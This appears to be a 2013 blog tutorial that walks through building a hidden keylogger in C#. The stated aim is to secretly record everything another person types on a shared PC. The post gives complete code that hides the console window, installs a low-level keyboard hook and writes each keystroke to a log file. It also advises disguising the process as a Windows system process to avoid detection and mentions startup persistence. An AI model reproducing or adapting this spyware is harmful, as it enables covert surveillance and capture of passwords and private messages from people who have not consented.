Wednesday, May 1, 2013

How to Create a Simple, Hidden Console Keylogger in C# Sharp

Today I will show you how to create a simple keylogger in Visual C# Sharp, which will start up hidden from view, and record anything the user types on the keybord, then save it into a text file. Great if you share a PC and want to track what someone else is writing.

You Will Need

Visual C# 2010 Express

Step 1 Create the Project

This is semi-important, usually you don't put much thought behind this, but I recommend naming this project something like "Windows Local host Process" or whatever, so that IF the user you are tracking suddenly decides to look up windows processes, your app will not be so easy to distinguish from something Windows would already have running in the background.

Why? Well, renaming the .exe file is not enough, the name you give your project will appear in the task manager, so assuming you are not a very technical user, if you see a process called ''cmd.exe | ConsoleApplication5" then alarm bells should not be ringing. However, if you see "sysWin86 | Windows Local Host Process" you won't know right away that it is not a legitimate process.

So create a Console Application project, name it appropriately and in the "Using" clause, include the following, if it's not already there:

using System.Diagnostics;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
Step 2 Declaration Clause and Referencing

Just below "Class YourProject {", add the following:

private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;

In the "Main" function ("public static Main") add:

var handle = GetConsoleWindow();

// Hide
ShowWindow(handle, SW_HIDE);

_hookID = SetHook(_proc);
Application.Run();
UnhookWindowsHookEx(_hookID);

Finally, go into Project >> Add References.

In the .NET tab, choose System.Windows.Forms and add it to your project.
Step 3 Functions for Key Capturing

Below the Main clause, add these functions:

private delegate IntPtr LowLevelKeyboardProc(
int nCode, IntPtr wParam, IntPtr lParam);

private static IntPtr HookCallback(
int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
Console.WriteLine((Keys)vkCode);
StreamWriter sw = new StreamWriter(Application.StartupPath+ @"\log.txt",true);
sw.Write((Keys)vkCode);
sw.Close();
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
Step 4 DLL Imports

After adding the key capture functions, add these:

//These Dll's will handle the hooks. Yaaar mateys!

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook,
LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
IntPtr wParam, IntPtr lParam);

[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);

// The two dll imports below will handle the window hiding.

[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();

[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

const int SW_HIDE = 0;

Step 5 Compile and Try it Out!

This is the fun step. Once you have added all the code, just run the compiler and try out the .exe!

As the window is hidden, but still records every keystroke, you will now log all the keystrokes ever pressed on that PC.
Further Improvements
Log file management could be improved by inserting line breaks at certain intervals. Something I did not bother with for this particular exercise.
It is possible to create a global mouse hook which will tell you what applications your mouse interacted with, where the cursor was and so forth. Google is your friend on this one.
Run @ Startup script.

No comments:

Post a Comment